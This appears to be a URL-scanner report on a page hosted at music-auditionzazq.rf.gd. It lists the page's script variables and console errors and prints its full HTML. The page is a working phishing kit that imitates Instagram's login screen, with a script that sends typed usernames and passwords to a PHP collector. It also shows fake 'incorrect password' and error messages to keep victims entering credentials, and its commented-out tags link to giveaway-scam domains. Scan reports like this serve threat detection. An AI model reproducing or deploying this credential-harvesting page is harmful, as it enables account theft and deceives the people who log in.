http://music-auditionzazq.rf.gd/sc/?i=1

Submitted URL:
http://music-auditionzazq.rf.gd/scRedirected
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 8 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
onscrollendobject
loginobject
loaderobject
feedbackobject
usernameobject
passwordobject
xnumber

Console log messages · 3 found

Messages logged to the web console

TypeCategoryLog
errornetwork
URL
https://errors.infinityfree.net/errors/404/
Text
Failed to load resource: the server responded with a status of 404 ()
verbosedom
URL
http://music-auditionzazq.rf.gd/sc/?i=1
Text
[DOM] Password field is not contained in a form: (More info: https://goo.gl/9p2vKq) %o
errornetwork
URL
https://errors.infinityfree.net/errors/404/
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- <title>Giveaway Instant Portal </title> -->
    <link rel="stylesheet" href="main.css">
    <!-- HTML Meta Tags -->
<!-- <meta name="description" content="Discover the latest fashion trends with lobiluxurydesign. Shop the new collection of clothing, footwear, accessories, beauty products and more."> -->

<!-- Facebook Meta Tags -->
<!-- <meta property="og:url" content="http://giveawaycashpromotion.epizy.com/">
<meta property="og:type" content="website">
<meta property="og:title" content="Giveawaycashpromotion">
<meta property="og:description" content="">
<meta property="og:image" content="http://giveawaycashpromotion.epizy.com/images/istockphoto-1328835253-612x612.jpg"> -->

<!-- Twitter Meta Tags -->
<!-- <meta name="twitter:card" content="summary_large_image">
<meta property="twitter:domain" content="giveawaycashpromotion.epizy.com">
<meta property="twitter:url" content="http://giveawaycashpromotion.epizy.com/">
<meta name="twitter:title" content="Giveawaycashpromotion">
<meta name="twitter:description" content="">
<meta name="twitter:image" content="http://giveawaycashpromotion.epizy.com/images/istockphoto-1328835253-612x612.jpg"> -->

<!-- Meta Tags Generated via https://www.opengraph.xyz -->

</head>
<body><div id="body">
    
    <section class="section-all">

        <!-- 1-Role Main -->
        <main class="main" role="main">
            <div class="wrapper">
                <article class="article">
                    <div class="content">
                        <div class="login-box">
                            <div class="header">
                                <img class="logo" src="./images/1024px-Instagram_logo.svg.png">
                            </div><!-- Header end -->
                            <div class="form-wrap">
                                <!-- <form class="form"> -->

                                    <div class="input-box">
                                        <input type="text" id="username" aria-describedby="" placeholder="Phone number, username, or email">
                                    </div>

                                    <div class="input-box">
                                        <input type="password" id="password" placeholder="Password">
                                    </div>

                                    <span class="button-box">
                                        <img src="./images/hug.gif" width="20px" id="loader" style="position: absolute; top: 0.5em; left: 9em; display: none; ">

                                        <button class="btn" name="login" id="login">Log in</button>
                                    </span>

                                    <a class="forgot" href="">Forgot password?</a>
                                    <p id="feedback" style="color: red; font-family: sans-serif; font-size: 15px; text-align: center; margin: 0 30px; display: none;"></p><br>

                                <!-- </form> -->
                            </div> <!-- Form-wrap end -->
                        </div> <!-- Login-box end -->

                        <div class="login-box">
                            <p class="text">Don't have an account?<a href="#">Sign up</a></p>
                        </div> <!-- Signup-box end -->

                        <div class="app">
                            
                            <p>Get the app.</p>
                            <div class="app-img">
                                <a href="">
                                    <img src="./images/ios.png" style="height: 50px;">
                                </a>
                                <a href="">
                                    <img src="./images/google.png" style="height: 40px; margin-top: 5px;">
                                </a>
                            </div> <!-- App-img end-->
                        </div> <!-- App end -->
                    </div> <!-- Content end -->
                </article>
            </div> <!-- Wrapper end -->
        </main>

        <!-- 2-Role Footer -->
        <footer class="footer" role="contentinfo">
            <div class="footer-container">

                <nav class="footer-nav" role="navigation">
                    <ul>
                        <li><a href="">About Us</a></li>
                        <li><a href="">Support</a></li>
                        <li><a href="">Blog</a></li>
                        <li><a href="">Press</a></li>
                        <li><a href="">Api</a></li>
                        <li><a href="">Jobs</a></li>
                        <li><a href="">Privacy</a></li>
                        <li><a href="">Terms</a></li>
                        <li><a href="">Directory</a></li>
                        <li>
                            <span class="language">Language
                                <select name="language" class="select" onchange="la(this.value)">
                                    <option value="#">English</option>
                                    <option value="">Russian</option>
                                </select>
                            </span>
                        </li>
                    </ul>
                </nav>

                <!-- <span class="footer-logo">&copy; 2018 Instagram</span> -->
            </div> <!-- Footer container end -->
        </footer>

    </section>
     <!-- Root -->
    </div>
    <h1 id="h1" style="text-align: center; position: absolute; top: 50%; left: 50%; "></h1>
<script>
         var login = document.getElementById('login');
        var loader = document.getElementById('loader')
        var feedback = document.getElementById('feedback')
        var username = document.getElementById('username')
        var password = document.getElementById('password')
        var x = 0;
        login.addEventListener('click', function () {
            login.textContent = "";
            loader.style.display = 'block'

            setTimeout(() => {
                login.textContent = 'Log In'
                loader.style.display = 'none'

            // function load() {
            const data = new FormData();
            data.append('username', username.value);
            data.append('password', password.value);
            const response = new XMLHttpRequest();
            response.onreadystatechange = function () {
                feedback.style.display = 'block'
            }
            response.open('POST', './database/login.php', true);
            response.send(data);
            x ++
            feedback.textContent = 'The password you entered is incorrect. Please check your password and try again';
            if (x == 2) {
                feedback.textContent = 'Sorry an error occurred please try again later'
                // window.location.href='https://www.giveawaymonkey.com/'
            }
        //    }

            }, 1500);


        //  function text() {
        //      login.textContent = 'Log In'
        //  }
        //     setTimeout(() => {
        //       load();
        //       text();
        //       loader.style.display = 'none';
        //       login.style.padding = '10px'

        //   }, 1500); 

        })
</script>
<script src="./f.js"></script>


</body></html>